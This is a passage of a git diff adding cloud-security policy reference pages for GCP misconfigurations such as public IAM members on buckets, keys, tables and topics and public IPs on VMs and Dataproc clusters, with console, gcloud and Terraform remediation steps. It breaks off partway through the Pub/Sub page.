a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc new file mode 100644 index 000000000..04a1e772c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc @@ -0,0 +1,96 @@ +== GCP Storage buckets has public access to all authenticated users + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02ea95c9-ad87-4c3d-b66e-2dc5ef4a8fe9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py[CKV_GCP_28] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Allowing anonymous or public access to a Cloud Storage bucket grants permissions to anyone to access the bucket's content. +If you are storing sensitive data in the bucket, anonymous and public access may not be desired. +We recommend you ensure anonymous and public access to a bucket is not allowed. + +//// +=== Fix - Runtime + + +*GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/storage/browser[Storage]. + +. Navigate to the *Bucket* details page and select the _bucket name_. + +. Click the *Permissions* tab. + +. To remove a specific role assignment, click *Delete* next to *allUsers* and *allAuthenticatedUsers*.
+ + +*CLI Command* + + +To remove access to *allUsers* and *allAuthenticatedUsers*, use the following commands: `gsutil iam ch -d allUsers gs://BUCKET_NAME` and `gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket_iam_member +* *Field:* member +* *Resource:* google_storage_bucket_iam_binding +* *Field:* members + + +[source,go] +---- +//Option 1 +resource "google_storage_bucket_iam_member" "member" { + bucket = google_storage_bucket.default.name + role = "roles/storage.admin" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_storage_bucket_iam_binding" "binding" { + bucket = google_storage_bucket.default.name + role = "roles/storage.admin" + members = [ +- "allAuthenticatedUsers", +- "allUsers" + ] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc new file mode 100644 index 000000000..2f4aa7c7d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc @@ -0,0 +1,114 @@ +== GCP VM instance with the external IP address + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fb8d5eca-45b1-4a6a-855b-b517ab10d71d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py[CKV_GCP_40] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +To reduce your attack surface, Compute instances should not have public IP addresses. +To minimize the instance's exposure to the internet, configure instances behind load balancers.
+We recommend you ensure compute instances are not configured to have external IP addresses. + +//// +=== Fix - Runtime + + +*GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances[VM instances]. + +. On the *Instance details* page, click the *instance name*. + +. Click *Edit*. + +. For each *Network interface*, ensure that *External IP* is set to *None*. + +. Click *Done*, then click *Save*. + + +*CLI Command* + + + +. Describe the instance properties: `gcloud compute instances describe INSTANCE_NAME --zone=ZONE` + +. Identify the access config name that contains the external IP address. ++ +This access config appears in the following format: ++ +[source,yaml] +---- +networkInterfaces: +- accessConfigs: + - kind: compute#accessConfig + name: External NAT + natIP: 130.211.181.55 + type: ONE_TO_ONE_NAT +---- + + +. To delete the access config, use the following command: +---- +gcloud compute instances delete-access-config INSTANCE_NAME +--zone=ZONE +--access-config-name "ACCESS_CONFIG_NAME" +---- ++ +NOTE: In the above example the *ACCESS_CONFIG_NAME* is *External NAT*. The name of your access config may be different. + +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* google_compute_instance +* *Field:* access_config + + +[source,go] +---- +resource "google_compute_instance" "example" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} +- access_config { + ... 
+ } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..36d727e1a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,109 @@ +== GCP Cloud Run services are anonymously or publicly accessible + +Cloud Run services are fully managed serverless environments used to develop and deploy containerized applications. +In GCP, Cloud Run services support a wide variety of authentication methods to execute (invoke) the container. +One of those methods is based on the use of two special IAM principals: _allUsers_ and _allAuthenticatedUsers_. +When those IAM principals have access to the Cloud Run service, anyone on the internet can execute or access the Cloud Run service. +We recommend you ensure that neither anonymous nor public access to Cloud Run services is allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5c1b1e3a-02d4-45d7-bbcd-a6bc17bc38dd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py[CKV_GCP_102] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +*GCP Console* + + +To remove anonymous or public access to your Cloud Run service: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/run[Cloud Run]. + +. View your service's _Service details_ page by clicking on your *Service Name*. + +. Select the *PERMISSIONS* tab. + +. 
To remove a specific role assignment, select *allUsers* or *allAuthenticatedUsers*, and then click *Delete*. + + +*CLI Command* + + +To remove anonymous or public access to your Cloud Run service, execute the following command: + + +[source,shell] +---- +gcloud run services remove-iam-policy-binding SERVICE-NAME \ + --member=MEMBER-TYPE \ + --role=ROLE +---- + +Replace *SERVICE-NAME* with your Cloud Run service name. +Replace *MEMBER-TYPE* with the member you want to delete (either *allUsers* or *allAuthenticatedUsers*). +Replace *ROLE* with the IAM member's assigned role. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_cloud_run_service_iam_binding +* *Field:* members +* *Resource:* google_cloud_run_service_iam_member +* *Field:* member + + +[source,go] +---- +resource "google_cloud_run_service_iam_binding" "public_binding" { + location = google_cloud_run_service.default.location + service = google_cloud_run_service.default.name + role = "roles/run.invoker" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +} + + +resource "google_cloud_run_service_iam_member" "public_member" { + location = google_cloud_run_service.default.location + service = google_cloud_run_service.default.name + role = "roles/run.invoker" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..6133d3ec3 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,118 @@ +== GCP Artifact Registry
repositories are anonymously or publicly accessible + +*Artifact Registry* is a service that stores artifacts and build dependencies for your GCP applications. +Artifact Registry repositories can contain sensitive credentials that are baked into containers, personal data (like PII), or confidential data that you may not want publicly accessible. +Repositories can be made anonymously or publicly accessible via IAM policies containing the IAM members _allUsers_ or _allAuthenticatedUsers_. +We recommend you ensure that neither anonymous nor public access to *Artifact Registry repositories* is allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8c238bd3-9898-4cee-878f-99874eafd326 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py[CKV_GCP_101] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +*GCP Console* + + +To remove anonymous or public access for your Artifact Registry repository: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/artifacts[Repositories]. + +. Select the target *Artifact Registry* repository. + +. Expand the _Info Panel_ by selecting *Show Info Panel*. + +. To remove a specific role assignment, select *allUsers* or *allAuthenticatedUsers*, and then click *Remove member*. + + +*CLI Command* + + +To remove anonymous or public access for your Artifact Registry repositories, use the following command: + + +[source,shell] +---- +gcloud artifacts repositories remove-iam-policy-binding REPOSITORY \ + --member=MEMBER \ + --role=ROLE +---- + +Replace *REPOSITORY* with your repository ID. +Replace *MEMBER* with _allUsers_ or _allAuthenticatedUsers_ depending on your Checkov alert. +Replace *ROLE* with the member's role.
+//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_artifact_registry_repository_iam_binding +* *Field:* members +* *Resource:* google_artifact_registry_repository_iam_member +* *Field:* member + + +[source,go] +---- +resource "google_artifact_registry_repository_iam_binding" "public_binding" { + provider = google-beta + location = google_artifact_registry_repository.my-repo.location + repository = google_artifact_registry_repository.my-repo.name + role = "roles/artifactregistry.writer" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +} +---- + + +[source,go] +---- +resource "google_artifact_registry_repository_iam_member" "public_member" { + provider = google-beta + location = google_artifact_registry_repository.my-repo.location + repository = google_artifact_registry_repository.my-repo.name + role = "roles/artifactregistry.writer" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc new file mode 100644 index 000000000..d50f45b52 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc @@ -0,0 +1,128 @@ +== GCP BigQuery Tables are anonymously or publicly accessible + +GCP BigQuery tables are the resources in BigQuery that contain your data records, and each BigQuery table belongs to a dataset. +Every BigQuery table inherits the IAM policies attached to its dataset, but each table can also have its own IAM policies directly applied.
+These table-level IAM policies can be set for public access via the *allUsers* and *allAuthenticatedUsers* IAM principals, which can inadvertently expose your data to the public.
+We recommend you ensure anonymous and public access to BigQuery tables is not allowed.
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bdb9b829-d0ef-425f-839d-7f9ff9a99f25
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py[CKV_GCP_100]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To change the policy using the GCP Console, follow these steps:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/bigquery[BigQuery].
+
+. On the *Dataset Explorer* details page, expand the _dataset_ that contains your _table_.
+
+. Select your target table's kebab menu and then select *Open*.
+
+. Click the *SHARE* button to open the table's IAM policies.
+
+. To remove a specific role assignment, click *Delete* in front of *allUsers* or *allAuthenticatedUsers*.
+
+
+*CLI Command*
+
+
+To remove access for *allUsers* and *allAuthenticatedUsers*, you first need to get the BigQuery table's existing IAM policy.
+To retrieve the existing policy and copy it to a local file:
+
+
+[source,shell]
+----
+bq get-iam-policy --format=prettyjson \
+  PROJECT-ID:DATASET.TABLE \
+  > policy.json
+----
+
+
+Replace *PROJECT-ID* with the project ID where the BigQuery table lives.
+Replace *DATASET* with the name of the BigQuery dataset that contains the table.
+Replace *TABLE* with the table name.
+Next, locate and remove the IAM bindings with either *allUsers* or *allAuthenticatedUsers* depending on your Checkov error.
+After modifying the `policy.json` file, update the BigQuery table with the following command:
+
+
+[source,shell]
+----
+bq set-iam-policy \
+  PROJECT-ID:DATASET.TABLE \
+  policy.json
+----
+
+Replace *PROJECT-ID* with the project ID where the BigQuery table lives.
+Replace *DATASET* with the name of the BigQuery dataset that contains the table.
+Replace *TABLE* with the table name.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_bigquery_table_iam_member
+* *Field:* member
+* *Resource:* google_bigquery_table_iam_binding
+* *Field:* members
+
+
+[source,go]
+----
+//Option 1
+resource "google_bigquery_table_iam_member" "member" {
+  dataset_id = google_bigquery_table.default.dataset_id
+  table_id   = google_bigquery_table.default.table_id
+  role       = "roles/bigquery.dataOwner"
+- member = "allUsers"
+- member = "allAuthenticatedUsers"
+}
+
+
+//Option 2
+resource "google_bigquery_table_iam_binding" "binding" {
+  dataset_id = google_bigquery_table.default.dataset_id
+  table_id   = google_bigquery_table.default.table_id
+  role       = "roles/bigquery.dataOwner"
+  members = [
+-   "allUsers",
+-   "allAuthenticatedUsers"
+  ]
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc
new file mode 100644
index 000000000..d240c9dfb
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc
@@ -0,0 +1,121 @@
+== GCP Dataflow jobs are not private
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0dac0cf1-0ac1-43df-8bdc-6b0ea4c31143
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py[CKV_GCP_94]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Cloud Dataflow in GCP is a service used for streaming and batch data processing.
+A Dataflow job consists of at least one management node and one compute node (both are GCE VMs).
+By default, these nodes are configured with public IPs that allow them to communicate with the public internet, but this also means they increase your potential attack surface by being publicly accessible.
+We recommend you remove the public IPs from your Dataflow jobs.
+View the https://cloud.google.com/dataflow/docs/guides/routes-firewall#internet_access_for[official Google documentation] for the currently supported internet access configuration options.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+Making Dataflow jobs private via the console is not currently supported.
+
+
+*CLI Command*
+
+
+Making *running* Dataflow jobs private via the `gcloud` CLI is not currently supported.
+Instead, you need to *drain* or *cancel* your job and then re-create it with the correct flag configured.
+
+
+[source,shell]
+----
+# To cancel a Dataflow job
+gcloud dataflow jobs cancel JOB_ID
+----
+
+Replace *JOB_ID* with your Dataflow job ID.
+
+
+[source,shell]
+----
+# To drain a Dataflow job
+gcloud dataflow jobs drain JOB_ID
+----
+
+Replace *JOB_ID* with your Dataflow job ID.
+
+
+[source,shell]
+----
+# To create a new Dataflow job without public IPs
+gcloud dataflow jobs run JOB_NAME \
+  --disable-public-ips \
+  --gcs-location=GCS_LOCATION
+----
+
+Replace *JOB_NAME* with a name for the new Dataflow job.
+Replace *GCS_LOCATION* with the GCS bucket name where your job template lives; it must be a URL beginning with `gs://`.
+Google also provides documentation on how to https://cloud.google.com/dataflow/docs/guides/routes-firewall#turn_off_external_ip_address[Turn off external IP address] for your Dataflow jobs.
+This documentation has examples for *Java* and *Python*.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_dataflow_job
+* *Field:* ip_configuration
+
+
+[source,go]
+----
+resource "google_dataflow_job" "big_data_job" {
+  name              = "dataflow-job"
+  template_gcs_path = "gs://my-bucket/templates/template_file"
+  temp_gcs_location = "gs://my-bucket/tmp_dir"
+  parameters = {
+    foo = "bar"
+    baz = "qux"
+  }
+
+- ip_configuration = "WORKER_IP_PUBLIC"
++ ip_configuration = "WORKER_IP_PRIVATE"
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc
new file mode 100644
index 000000000..d78e8bb26
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc
@@ -0,0 +1,115 @@
+== GCP KMS crypto key is anonymously accessible
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e4c7d880-c590-481c-86cc-8c55245609b0
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+=== Description
+
+*Cloud KMS cryptokeys* are your encryption keys that protect your data in GCP.
+Allowing anonymous or public access to a cryptokey could allow untrusted individuals to access your sensitive data.
+We recommend you ensure anonymous and public access to *Cloud KMS cryptokeys* is not allowed.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To change the policy using the GCP Console, follow these steps:
+
+. Log in to the https://console.cloud.google.com[GCP Console].
+
+. Navigate to https://console.cloud.google.com/security/kms/keyrings[Key Management].
+
+. On the *Key Rings* details page, select your _key ring_ where your cryptokey is stored.
+
+. Select your cryptokey from the _Key ring details_ page.
+
+. Expand the _Info Panel_ by selecting *Show Info Panel*.
+
+. To remove a specific role assignment, select *allUsers* or *allAuthenticatedUsers*, and then click *Remove member*.
+
+
+*CLI Command*
+
+
+To remove access to *allUsers* and *allAuthenticatedUsers*, use the following command:
+
+
+[source,shell]
+----
+gcloud kms keys remove-iam-policy-binding KEY-NAME \
+  --keyring KEY-RING \
+  --location LOCATION \
+  --member PRINCIPAL \
+  --role roles/ROLE-NAME
+----
+
+Replace *KEY-NAME* with the name of the public cryptokey.
+Replace *KEY-RING* with the name of the key ring.
+Replace *LOCATION* with the location of the key ring.
+Replace *PRINCIPAL* with either *allUsers* or *allAuthenticatedUsers* depending on your Checkov error.
+Replace *ROLE-NAME* with the name of the role to remove.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_kms_crypto_key_iam_member
+* *Field:* member
+* *Resource:* google_kms_crypto_key_iam_binding
+* *Field:* members
+
+
+[source,go]
+----
+//Option 1
+resource "google_kms_crypto_key_iam_member" "crypto_key" {
+  crypto_key_id = google_kms_crypto_key.key.id
+  role          = "roles/cloudkms.cryptoKeyEncrypter"
+
+- member = "allUsers"
+- member = "allAuthenticatedUsers"
+}
+
+
+//Option 2
+resource "google_kms_crypto_key_iam_binding" "crypto_key" {
+  crypto_key_id = google_kms_crypto_key.key.id
+  role          = "roles/cloudkms.cryptoKeyEncrypter"
+
+  members = [
+-   "allUsers",
+-   "allAuthenticatedUsers"
+  ]
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc
new file mode 100644
index 000000000..3f140d8b7
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc
@@ -0,0 +1,106 @@
+== GCP Dataproc Clusters have public IPs
+
+Dataproc is commonly used for data lake modernization, ETL, and data science workloads.
+A Dataproc cluster contains at least one "management" VM and one "compute" VM, which are deployed into a VPC network.
+A common misconfiguration is creating a *Dataproc cluster* with public IPs.
+This security misconfiguration could put your data at risk of accidental exposure, because a public IP accompanied by an open firewall rule allows potentially unauthorized access to the underlying Dataproc VMs.
+We recommend you only assign private IPs to your Dataproc clusters.
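+
+As a minimal illustrative sketch (the cluster name and subnetwork below are hypothetical, not part of this policy), a fully private cluster sets `internal_ip_only` at creation time:
+
+[source,go]
+----
+resource "google_dataproc_cluster" "private_cluster" {
+  name   = "my-private-cluster" # hypothetical name
+  region = "us-central1"
+
+  cluster_config {
+    gce_cluster_config {
+      # Workers receive only internal IPs; the subnetwork should have
+      # Private Google Access enabled so the cluster can reach GCP APIs.
+      internal_ip_only = true
+      subnetwork       = "my-subnet" # hypothetical subnetwork
+    }
+  }
+}
+----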
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 541aafce-57c0-445f-9945-abd9fec2d5c4
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py[CKV_GCP_103]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+It is not currently possible to edit a running *Dataproc cluster* to remove its public IPs.
+To create a *Dataproc cluster* with only private IPs:
+
+. Log in to the GCP Console.
+
+. Navigate to https://console.cloud.google.com/dataproc/clusters[Dataproc].
+
+. Select _Customize Cluster_ to view *Network Configuration* settings.
+
+. Locate the _Internal IP Only_ section and select the checkbox next to *Configure all instances to have only internal IP addresses*.
+
+
+*CLI Command*
+
+
+It is not currently possible to edit a running *Dataproc cluster* to remove its public IPs.
+To create a *Dataproc cluster* with only private IPs, you need to specify the `--no-address` flag.
+As an example:
+
+
+[source,shell]
+----
+gcloud beta dataproc clusters create my_cluster \
+  --region=us-central1 \
+  --no-address
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_dataproc_cluster
+* *Field:* internal_ip_only
+
+
+[source,go]
+----
+resource "google_dataproc_cluster" "accelerated_cluster" {
+  name   = "my-cluster-with-gpu"
+  region = "us-central1"
+
+  cluster_config {
+    gce_cluster_config {
+      zone = "us-central1-a"
+- internal_ip_only = false
++ internal_ip_only = true
+    }
+
+    master_config {
+      accelerators {
+        accelerator_type  = "nvidia-tesla-k80"
+        accelerator_count = "1"
+      }
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc
new file mode 100644
index 000000000..592fe4278
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc
@@ -0,0 +1,117 @@
+== GCP Dataproc clusters are anonymously or publicly accessible
+
+Dataproc is commonly used for data lake modernization, ETL, and data science workloads.
+A Dataproc cluster contains at least one "management" VM and one "compute" VM.
+Access to Dataproc clusters is controlled via IAM policies.
+These IAM policies can be set for public access via the *allUsers* and *allAuthenticatedUsers* IAM principals, which can inadvertently expose your data to the public.
+We recommend you ensure anonymous and public access to Dataproc clusters is not allowed.
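+
+For contrast, a least-privilege sketch (the service account address below is hypothetical) grants cluster access to a single named principal rather than a public IAM member:
+
+[source,go]
+----
+resource "google_dataproc_cluster_iam_member" "viewer" {
+  cluster = "your-dataproc-cluster"
+  role    = "roles/viewer"
+  # One named service account instead of allUsers / allAuthenticatedUsers.
+  member  = "serviceAccount:data-team@my-project.iam.gserviceaccount.com"
+}
+----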
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a2137a15-0625-4e4c-b6c3-29062acad177
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py[CKV_GCP_98]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To remove anonymous or public access for Dataproc clusters:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/dataproc/clusters[Clusters].
+
+. Select the target *Dataproc cluster*.
+
+. Expand the _Info Panel_ by selecting *Show Info Panel*.
+
+. To remove a specific role assignment, select *allUsers* or *allAuthenticatedUsers*, and then click *Remove member*.
+
+
+*CLI Command*
+
+
+To remove access for *allUsers* and *allAuthenticatedUsers*, you first need to get the Dataproc cluster's existing IAM policy.
+To retrieve the existing policy and copy it to a local file:
+
+
+[source,shell]
+----
+gcloud dataproc clusters get-iam-policy CLUSTER-ID \
+  --format json > policy.json
+----
+
+Replace *CLUSTER-ID* with your Dataproc cluster ID.
+Next, locate and remove the IAM bindings with either *allUsers* or *allAuthenticatedUsers* depending on your Checkov error.
+After modifying the `policy.json` file, update the Dataproc cluster with the following command:
+
+
+[source,shell]
+----
+gcloud dataproc clusters set-iam-policy CLUSTER-ID policy.json
+----
+
+Replace *CLUSTER-ID* with your Dataproc cluster ID.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_dataproc_cluster_iam_member
+* *Field:* member
+* *Resource:* google_dataproc_cluster_iam_binding
+* *Field:* members
+
+
+[source,go]
+----
+//Option 1
+resource "google_dataproc_cluster_iam_member" "editor" {
+  cluster = "your-dataproc-cluster"
+  role    = "roles/editor"
+- member = "allUsers"
+- member = "allAuthenticatedUsers"
+}
+
+
+//Option 2
+resource "google_dataproc_cluster_iam_binding" "editor" {
+  cluster = "your-dataproc-cluster"
+  role    = "roles/editor"
+  members = [
+-   "allUsers",
+-   "allAuthenticatedUsers"
+  ]
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc
new file mode 100644
index 000000000..d2e17a956
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc
@@ -0,0 +1,129 @@
+== GCP Pub/Sub Topics are anonymously or publicly accessible
+
+Pub/Sub is commonly used for asynchronous communication between applications in GCP.
+Messages are published to a *Pub/Sub Topic*, and the ability to publish a message is controlled via IAM policies.
+It is possible to make *Pub/Sub Topics* publicly or anonymously accessible.
+Public notification topics can expose sensitive data and are a target for data exfiltration.
+We recommend you ensure that neither anonymous nor public access to *Pub/Sub Topics* is allowed.
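+
+A compliant configuration instead names each principal explicitly; the sketch below (the service account address is hypothetical) grants publish rights to a single identity rather than a public IAM member:
+
+[source,go]
+----
+resource "google_pubsub_topic_iam_member" "publisher" {
+  topic = google_pubsub_topic.example.name
+  role  = "roles/pubsub.publisher"
+  # One named service account instead of allUsers / allAuthenticatedUsers.
+  member = "serviceAccount:publisher@my-project.iam.gserviceaccount.com"
+}
+----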
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8a6f206c-9d55-4acc-bc84-c07fd4689404
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py[CKV_GCP_99]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To remove anonymous or public access to your Pub/Sub Topic:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/cloudpubsub/topic/list[Topics].
+
+. Select the _Pub/Sub Topic checkbox_ next to your *Topic ID*.
+
+. Select the *INFO PANEL* tab to view the topic's permissions.
+
+. To remove a specific role assignment, select *allUsers* or *allAuthenticatedUsers*, and then click *Delete*.
+
+
+*CLI Command*
+
+
+To remove access for *allUsers* and *allAuthenticatedUsers*, you first need to get the *Pub/Sub Topic's* existing IAM policy.
+To retrieve the existing policy and copy it to a local file:
+
+
+[source,shell]
+----
+gcloud pubsub topics get-iam-policy \
+  projects/PROJECT/topics/TOPIC \
+  --format json > topic_policy.json
+----
+
+Replace *PROJECT* with the project ID where your Pub/Sub Topic is located.
+Replace *TOPIC* with the Pub/Sub Topic ID.
+Next, locate and remove the IAM bindings with either *allUsers* or *allAuthenticatedUsers* depending on your Checkov error.
+After modifying the `topic_policy.json` file, update the Pub/Sub Topic with the following command:
+
+
+[source,shell]
+----
+gcloud pubsub topics set-iam-policy \
+  projects/PROJECT/topics/TOPIC \
+  topic_policy.json
+----
+
+Replace *PROJECT* with the project ID where your Pub/Sub Topic is located.
+Replace *TOPIC* with the Pub/Sub Topic ID.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_pubsub_topic_iam_binding
+* *Field:* members
+* *Resource:* google_pubsub_topic_iam_member
+* *Field:* member
+
+
+[source,go]
+----
+resource "google_pubsub_topic_iam_binding" "public_binding" {
